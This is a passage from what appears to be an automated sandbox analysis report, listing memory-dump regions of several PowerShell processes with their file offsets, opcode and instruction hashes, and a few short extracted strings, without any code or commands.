                                                                            • Opcode Fuzzy Hash: 75301391fba6c7245ad1ae600845c02f33769548e0889c404dd14cb720a5b2dc
                                                                            • Instruction Fuzzy Hash: DBD1257190EB8A8FF7A6DB68C9555B57BA0EF46310B0851BEE44DC70D3EE18D809C392
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6ebf149c35fbb045ea605bb571b2b6dc055391e675b75434ab616c368276cb77
                                                                            • Instruction ID: 32775cebbf7485daa7c0782560249fe6c4f70d78ed08cd7c9636dd7a593173e3
                                                                            • Opcode Fuzzy Hash: 6ebf149c35fbb045ea605bb571b2b6dc055391e675b75434ab616c368276cb77
                                                                            • Instruction Fuzzy Hash: 62811177D4D693CFF305A76CA86A4F53B54EF42315B08C972D08DCA1A3ED14A49D41D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a0d84557480f133db3d0232e6c29c949144194562df1156737d8504ba8ae771e
                                                                            • Instruction ID: e2ee3a9ddb50231a74906f673cce9a967b53b36184b8421637e851ead59f6ec4
                                                                            • Opcode Fuzzy Hash: a0d84557480f133db3d0232e6c29c949144194562df1156737d8504ba8ae771e
                                                                            • Instruction Fuzzy Hash: 3331D97191CB488FEB58DF5CA8466E97BE0FB99311F00822FE44D93252DA70A955CBC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368486209.00007FFAAC45D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC45D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac45d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1caf930f0b21910a7611e459e41b9a51cf1fde4e4bf19931ad0ff0b1f7a1f358
                                                                            • Instruction ID: 6056b7792c3add3065daefa9d9958a9eff89f8682feb8d6c693d16de7c3bda11
                                                                            • Opcode Fuzzy Hash: 1caf930f0b21910a7611e459e41b9a51cf1fde4e4bf19931ad0ff0b1f7a1f358
                                                                            • Instruction Fuzzy Hash: C841E57180EBC88FE7568B2998459523FB0EF57314B1505EFD08CCB1A3D629EC4AC792
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0d3aef7a7eae41482b3fa5ad8e0e9b739eda790d72b20a1f6d1244237c175918
                                                                            • Instruction ID: af52fcc5099b08596ec5b680df3f79c6c0484155a7df48d3fe7fa6f09aea6a0a
                                                                            • Opcode Fuzzy Hash: 0d3aef7a7eae41482b3fa5ad8e0e9b739eda790d72b20a1f6d1244237c175918
                                                                            • Instruction Fuzzy Hash: FE21F83190C74C8FDB59DB6C984A7F97BF0EB56321F04426BD049C3162DA74A45ACB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                            • Instruction ID: bee303c1f4efc301387659d61f640e7d41f0dbd1056ec0066b2a57676e6cd883
                                                                            • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                            • Instruction Fuzzy Hash: 9001677115CB0D8FD744EF0CE451AA5B7E0FB99364F10056DE58AC36A1DA36E882CB45
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1369218840.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f41aa219a95db5e75f8efc135200cb73252cf6ba043750b4a2e8497cb8049611
                                                                            • Instruction ID: 98fad44a6fa9f3938d1eeda5f9f0367ade697f0e132eceb1b5e7c0aab8b25d6d
                                                                            • Opcode Fuzzy Hash: f41aa219a95db5e75f8efc135200cb73252cf6ba043750b4a2e8497cb8049611
                                                                            • Instruction Fuzzy Hash: ABF09A32A0D9048FE669EB5CE5428B877E0EF5636071150BAE05EC75A3DE25EC45C780
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1369218840.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a9f488187d3c0cd9392e1fe82b2a210667ef6a815f1d1451930baccbb8e42a45
                                                                            • Instruction ID: dc380cba1125bbff5b8d57a40e8dc992e243d9ac3144c927e7e16354fcaa7abe
                                                                            • Opcode Fuzzy Hash: a9f488187d3c0cd9392e1fe82b2a210667ef6a815f1d1451930baccbb8e42a45
                                                                            • Instruction Fuzzy Hash: 06F0BE32A0D5448FE755EB5CE4428A877E0EF06320B0150B6E14ECB863DE25EC44C780
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1369218840.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction ID: 5b26556ac9f6d81698c11dfb25d54ca3b06b608904ae503f88ca55104ebb7cfc
                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction Fuzzy Hash: ECE01A31B0C808CFEA69DB0CE2419B973E1EB9932171161B7D14EC7561DA22EC559BC0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: O_^$O_^$O_^$O_^
                                                                            • API String ID: 0-109995703
                                                                            • Opcode ID: cb98f664277115853659957bcbe671e2c85077d46fdf5f30a0bed13e92abe629
                                                                            • Instruction ID: eaf30d4da4c54d048ef435f650a703d7e27fc0ff641c15708c6c6b7b55a6058c
                                                                            • Opcode Fuzzy Hash: cb98f664277115853659957bcbe671e2c85077d46fdf5f30a0bed13e92abe629
                                                                            • Instruction Fuzzy Hash: 6441B19294F7D38FF75E435949650A03FE4EF53325B0D84F2E08D9B193E919A88A83D2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: O_^$O_^$O_^$O_^
                                                                            • API String ID: 0-109995703
                                                                            • Opcode ID: 5c3b72d0229c64122c88b7d1b5e300894b127f705a5b5e34962c5f7fee8e7aaf
                                                                            • Instruction ID: 8fcb5f9b03f996eda3b28d86da86a2de9994009f0c3f3039be158aa4b85655f3
                                                                            • Opcode Fuzzy Hash: 5c3b72d0229c64122c88b7d1b5e300894b127f705a5b5e34962c5f7fee8e7aaf
                                                                            • Instruction Fuzzy Hash: 1831F49294F7E3CBFA4E431909540A02FD4FF53334B0C88F2E08DAB183ED19A88A42D1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6abd0984cf4b72532f34fffc7a7544f2a52f5cf72eea69fc6d00eb0d10dfede
                                                                            • Instruction ID: 3a3614cf99ad423b1b6898f1f88f6482474efffdd449ee300e3721195c3cb17d
                                                                            • Opcode Fuzzy Hash: b6abd0984cf4b72532f34fffc7a7544f2a52f5cf72eea69fc6d00eb0d10dfede
                                                                            • Instruction Fuzzy Hash: 21D15F30A58A4E8FEF88DF58C459AA97BE1FF59300F14816AE40DD7296CE34E845CBC1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460952928.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac670000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6b6be4a88c3a9c65ec78ebc72bf2c28d2dc9e58de04150ff61413f6f7276f79
                                                                            • Instruction ID: 8abfbba1eced2201104748e12491b96405c061510dba6de1e570ec47d8ee6387
                                                                            • Opcode Fuzzy Hash: f6b6be4a88c3a9c65ec78ebc72bf2c28d2dc9e58de04150ff61413f6f7276f79
                                                                            • Instruction Fuzzy Hash: 3DD14561D0EB9A8FFB96DB2888155B97FA2EF46310B0855FED44DC70D3DA18D809C392
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b7fdbdc24209e0f0af3d6d056789f6dca9fbd720f4083553df789a628a859ca6
                                                                            • Instruction ID: 6594dc97401e7fdece22a500506e12be768ad6c4d028539eb73e2a635ecdbd5f
                                                                            • Opcode Fuzzy Hash: b7fdbdc24209e0f0af3d6d056789f6dca9fbd720f4083553df789a628a859ca6
                                                                            • Instruction Fuzzy Hash: B091263250C7868FE346D739885D5A57FE0EF87328B0842EED099C71A3EA269406C7D1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d7d6099fbbf7141264e06c8acaa79448807a397d62d882d4bc541205f9a532e5
                                                                            • Instruction ID: f1a8590ec52ad74e82660a8e9bfd8e8409ecbf2610248638b1dc148fe5fddbb8
                                                                            • Opcode Fuzzy Hash: d7d6099fbbf7141264e06c8acaa79448807a397d62d882d4bc541205f9a532e5
                                                                            • Instruction Fuzzy Hash: DA81FA6384D7C38FE312977D9C694E93F90EF5322870882F7E0D88A1A3ED14944A97D1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b8db0645dec075007a3730e5554cbf52cd6de5414fd4437d3a92d0468df04e0
                                                                            • Instruction ID: e4f7e5c2baa30c7e8e21f7fd31bdd55b2c64f6d6af2ace6dc10b92bfb4b6e2d8
                                                                            • Opcode Fuzzy Hash: 2b8db0645dec075007a3730e5554cbf52cd6de5414fd4437d3a92d0468df04e0
                                                                            • Instruction Fuzzy Hash: 0B7127A294DBD68FF7159B2D6C191E97FA0EF57710F0881BBE08C87193DA14A80987D2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9c877b884d0045be7275473f25e35e6c34d48521b4654d77617946f2d82b1116
                                                                            • Instruction ID: 5572d283e5a525efa55617abfa599b5de28cf394f1a27adf8d6bcf5d2040279b
                                                                            • Opcode Fuzzy Hash: 9c877b884d0045be7275473f25e35e6c34d48521b4654d77617946f2d82b1116
                                                                            • Instruction Fuzzy Hash: 7451993191CB498FDB1C9F5CA8466A8BBE0FB95721F00822FE04993651CB75A456CBC2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60d7f8e62f8a24aea7ef48d66d13aacbd06752b6ac8a6fc10a03f1a1625883b7
                                                                            • Instruction ID: 534a461bc250bb9707efc7e57b1fd49641c496bce89d6b91de79918965e650f4
                                                                            • Opcode Fuzzy Hash: 60d7f8e62f8a24aea7ef48d66d13aacbd06752b6ac8a6fc10a03f1a1625883b7
                                                                            • Instruction Fuzzy Hash: 6E31273190DB898FEB59DB68984A6FA7FE0EB52320F0481BFD04DC7153D965980ACB91
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1459641117.00007FFAAC48D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC48D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac48d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 56c58b8c706456dbb3f5d3f38712339ec276572bc428fb3bd3fd2e7c47f3942d
                                                                            • Instruction ID: dd8c37a23c21d7f6340427b0108d5e616ded9257bbf1902adf43670635b07945
                                                                            • Opcode Fuzzy Hash: 56c58b8c706456dbb3f5d3f38712339ec276572bc428fb3bd3fd2e7c47f3942d
                                                                            • Instruction Fuzzy Hash: E111A33190DF08CFAB58EF2DE4899627BE1FB84324710469ED42DCB166D630E845CB95
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                            • Instruction ID: 17302f02100e042e775f8c479ef8fc3f79d1b0800815a9ab55274fce78478d2f
                                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                            • Instruction Fuzzy Hash: 7F01677115CB0D8FD744EF0CE451AA5B7E0FB99364F10056EE58AC3661DA36E882CB45
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460952928.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac670000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a2c0ece47a71015d792c6a80913c5418856640d5d04ff375c2e143ba0b647309
                                                                            • Instruction ID: 7485df57bcc80b3cbb598a0832dff1692d43208f839ac1e0e9b472c5095faa29
                                                                            • Opcode Fuzzy Hash: a2c0ece47a71015d792c6a80913c5418856640d5d04ff375c2e143ba0b647309
                                                                            • Instruction Fuzzy Hash: 78F0BE32A0D5048FE769EB5CE4458B877E1EF5632071150BAE05DC75A3CE25EC44CB80
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460952928.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac670000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3296ecb02cfe1bbad376c72e91bbd249627807730a20d99f496824b6dc3941f
                                                                            • Instruction ID: 7f14f9aeb439d1650a7f7ae6479b4d04b047a040572fe7bc02b9b70b3479448d
                                                                            • Opcode Fuzzy Hash: a3296ecb02cfe1bbad376c72e91bbd249627807730a20d99f496824b6dc3941f
                                                                            • Instruction Fuzzy Hash: B9F0E232A0D5448FE755EB1CE4458A877E0FF06320B1150F6E04DCB463CE25EC54CB80
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460952928.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac670000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction ID: a51f642805fac1c5fa909f634fc3912e354b40176132437dc51191082ab1d2b3
                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction Fuzzy Hash: 1EE01A31B0C818CFEA69EB0CE0449B973E6EB9933171165B7D14EC7561DA22EC559BC0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: L_^5$L_^8$L_^F$L_^I$L_^K
                                                                            • API String ID: 0-3847582561
                                                                            • Opcode ID: b0851bed124db4d367917b27cd62f069190bd9d6d5e64ce8e97aca01ef74c68e
                                                                            • Instruction ID: 73e4a9cc0bfda8a440722697f2aa9f036fc7e9d4d19acd1d1024c346c80e7f27
                                                                            • Opcode Fuzzy Hash: b0851bed124db4d367917b27cd62f069190bd9d6d5e64ce8e97aca01ef74c68e
                                                                            • Instruction Fuzzy Hash: 182104B771C1169E92017B7EBC199ED7784CF98275349D2B2D3988F623DE14608A8AD0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: L_^$L_^$L_^$L_^$L_^
                                                                            • API String ID: 0-2264858084
                                                                            • Opcode ID: baa22ecd929014af9818b4dbd3945ab8ed61d091777445fe7f6bcc00147c8d0c
                                                                            • Instruction ID: 1b95e61cd839f16b07fc0c6f9a7574f6b544e2ea71e0a2ddadaf20c2d23f1aff
                                                                            • Opcode Fuzzy Hash: baa22ecd929014af9818b4dbd3945ab8ed61d091777445fe7f6bcc00147c8d0c
                                                                            • Instruction Fuzzy Hash: 08217F93D1E7C34EE357437A086D0556F90EE5722874E83E7C0E84B0E3EA28840AD395
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X7s
                                                                            • API String ID: 0-1336388102
                                                                            • Opcode ID: 7640c80e2f702364a36bab8c2f21e527caad4badfced618273e0a64aa69d5644
                                                                            • Instruction ID: a2912545a354bba3d8659e73a17db9a8ea954059e4fdfb09f8fb3213644fa2f5
                                                                            • Opcode Fuzzy Hash: 7640c80e2f702364a36bab8c2f21e527caad4badfced618273e0a64aa69d5644
                                                                            • Instruction Fuzzy Hash: FDC14861A1EACA8FFB66EB2888155B57BE1EF46310F0851BED44DC70D3DE18D90883D2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X7s
                                                                            • API String ID: 0-1336388102
                                                                            • Opcode ID: 43c1d14ab99ef307c7872a65d768da5a150e524560121f16e43dbeaaefef50d8
                                                                            • Instruction ID: e3520382be7d531bf3b2c50bd7a8c634381597495cb1b86943b1ead93a0f2c69
                                                                            • Opcode Fuzzy Hash: 43c1d14ab99ef307c7872a65d768da5a150e524560121f16e43dbeaaefef50d8
                                                                            • Instruction Fuzzy Hash: D881F3A6A1FAC68FFBA6D72848555746A91EF42310F58A0BED44DCB0C3DE18DD4883D2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0cf18f30d2bdfdca9531c4bcfd0f94dd73e5ba3948f0668b9a025db9264300b
                                                                            • Instruction ID: 59a0b338ff740f3caca21e28208f2e56eeb4e2323e6a85b4d6f408f7c1301a5e
                                                                            • Opcode Fuzzy Hash: b0cf18f30d2bdfdca9531c4bcfd0f94dd73e5ba3948f0668b9a025db9264300b
                                                                            • Instruction Fuzzy Hash: 3DC16F30A18A4A8FEF89EF58C455AA97BE1FF59300F14816AE40DD7296DE34E845CBC1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 48a728e6720239d26b5776f3ec553419dfe820477b0b718961ce5d46c2cf38f0
                                                                            • Instruction ID: 18d9635d8bb3216bd0f4b2990273c32d9609462209d9db2281ec113edc288297
                                                                            • Opcode Fuzzy Hash: 48a728e6720239d26b5776f3ec553419dfe820477b0b718961ce5d46c2cf38f0
                                                                            • Instruction Fuzzy Hash: 48512A32A0DA868FF79ADB3C44616757BD2DF96210B59A0BEC18EC7193DF14ED098381
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c23abe78ef26463f32a2f2a722768dbf9d0d10fbf74a49f794b384ca209264d5
                                                                            • Instruction ID: 254ae0344d94691cf7e183c8c5165db10e69f34fb0831e6bece36810f26adf20
                                                                            • Opcode Fuzzy Hash: c23abe78ef26463f32a2f2a722768dbf9d0d10fbf74a49f794b384ca209264d5
                                                                            • Instruction Fuzzy Hash: 11412C32A0EA498FF7A6D77C94619B47BD1EF46320B0864BAC24DC7193DE14ED0983C1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a81d4bf31db40ef8f52bb6b9b270bdc04299948dca31dc526b7e63fdd457287
                                                                            • Instruction ID: 0b48656a225c0186c7553bfa7d521e58b91f96262b0f4210edf747d7dc69a59f
                                                                            • Opcode Fuzzy Hash: 7a81d4bf31db40ef8f52bb6b9b270bdc04299948dca31dc526b7e63fdd457287
                                                                            • Instruction Fuzzy Hash: BE31DE7191CF488FEB589B5CA84A6A97BE1FBA5311F00812FE04DD3252DA70A855CBC2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1666150094.00007FFAAC49D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC49D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac49d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8bab5b6660bfbcc82c0b47fb41836bb51082e44583b955d33d6fa4c413ae76fa
                                                                            • Instruction ID: 20f805e2156d74bd1d47d7373b8b0da4cefd406932f720b216cbefc6f67b4412
                                                                            • Opcode Fuzzy Hash: 8bab5b6660bfbcc82c0b47fb41836bb51082e44583b955d33d6fa4c413ae76fa
                                                                            • Instruction Fuzzy Hash: 8041F57140EBC48FE756DB289845A523FF0EF57224B1946DFD088CB1A3D629E84AC792
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4657c4ea70204a7dde75611ded36aabd815b63953eca9bc1b30762ba68c0570d
                                                                            • Instruction ID: 1ef41aa47ede30a765c032f070fe4395278b24769e374f495a95ed942ee44d4f
                                                                            • Opcode Fuzzy Hash: 4657c4ea70204a7dde75611ded36aabd815b63953eca9bc1b30762ba68c0570d
                                                                            • Instruction Fuzzy Hash: EC21283090C74C8FEB19DB6C984A7E97FE0EB56320F04426BD049C3162DA74A44ACB91
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1c5facc79e1e2a3a83e1593983b22567b3f005d883d253c416959ddecad6dfe6
                                                                            • Instruction ID: 63591f4e6bfd9548f992751e7c2043dd8ba4f3fbb61d3c07135d07d3e6038e74
                                                                            • Opcode Fuzzy Hash: 1c5facc79e1e2a3a83e1593983b22567b3f005d883d253c416959ddecad6dfe6
